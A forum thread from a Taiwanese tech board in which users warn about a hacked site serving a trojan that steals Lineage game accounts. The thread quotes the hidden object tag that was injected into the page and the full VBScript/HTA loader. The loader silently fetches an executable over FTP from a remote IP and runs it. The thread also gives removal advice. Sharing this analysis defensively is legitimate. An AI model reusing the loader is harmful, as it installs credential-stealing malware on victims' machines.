|
PCDVD數位科技討論區
(https://www.pcdvd.com.tw/index.php)
- 疑難雜症區
(https://www.pcdvd.com.tw/forumdisplay.php?f=34)
- - Connect 通訊者天堂...又是病毒
(https://www.pcdvd.com.tw/showthread.php?t=370211)
|
|---|
Connect 通訊者天堂...又是病毒
Connect 通訊者天堂
http://www.oc-connect.com/ 掃描類型: 即時防護掃描 事件: 發現病毒! 病毒名稱:PWSteal.Trojan 檔案: C:\pangzi08.exe 位置: 隔離所 電腦: **** 使用者: **** 採取的動作: 清除 失敗 : 隔離 成功 : 拒絕存取 發現日期: Thu Aug 10 11:33:32 2000 |
首頁原始碼最下面有一行這個
代碼:
<object data="http://zhu.7xi.org/pangzi08/ng.test" weight=0 width=0></object> |
咦?
我的NIS2003(含NAV)沒反應耶.... 還有,樓主的檔案為啥位於C碟下? :confused: |
引用:
那檔會連接到那 |
引用:
這是木馬程式,屬於強制植入性質.... 專門盜取天堂帳號用的木馬! 自動執行後,會在c:\根 目錄下產生"pangzi08.exe"---> 刪除即可,在c:\windows下有個"Smcsvr.exe",必須 重新開機再手動刪除.....! 之前"超頻者天堂","遊戲基地","電玩勁檔中心"等國內大型討論區網站,都曾是受害網站~ 經小弟追查來源... 這大陸網址位於安徽省合肥市附近.....國內報章已經刊登過幾次天堂帳號被盜的事件, 應該都出於此作者之手....但天高皇帝遠,台灣方面目前也拿他沒輒! 小弟是不玩天堂啦! 隨時檢查自己的電腦狀況,留意上網網站的異狀,是比較保險的做法~~     |
我的卡巴斯基沒反應
該網站原始碼也沒大大講的內容耶 有人要去試試嗎? (上次oc的卡巴有抓到) |
引用:
ng.test的內容 代碼:
<HTA:APPLICATION caption="no" border="none" showInTaskBar="yes" windowState="minimize">
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script language="VBScript">
Dim fs, t
Set fs = CreateObject("Scripting.FileSystemObject")
Set t = fs.CreateTextFile("163.txt",True)
t.WriteLine("open 61.163.238.51")
t.WriteLine("new")
t.WriteLine("new")
t.WriteLine("lcd c:\")
t.WriteLine("bin")
t.WriteLine("get pangzi08.exe")
t.WriteLine("bye")
t.Close
wsh.Run "ftp -s:163.txt",0,true
wsh.Run "c:\pangzi08.exe"
fs.DeleteFile "163.txt",true
window.close
window.close
</script>
我猜會不會是利用某版IE的hole來搞的? 有跑windowsupdate更新到最新的就不會有事,也不會下載那個執行檔,所以防毒軟體就不會偵測到? |
看到這篇不知道該哭還是該笑........天堂..............死xx(指那些專門盜取天堂帳號),謝謝上面幾位大大的留言~~讓我警戒心又提高了^^
|
引用:
感謝說明! :agree: 兩個檔案都沒發現...... :yeah: |
之前我家的諾頓有抓到並刪除 :yeah:
我也是因為這原因才把趨勢換掉的 :jolin: |
| 所有的時間均為GMT +8。 現在的時間是08:33 PM. |
vBulletin Version 3.0.1
powered_by_vbulletin 2025。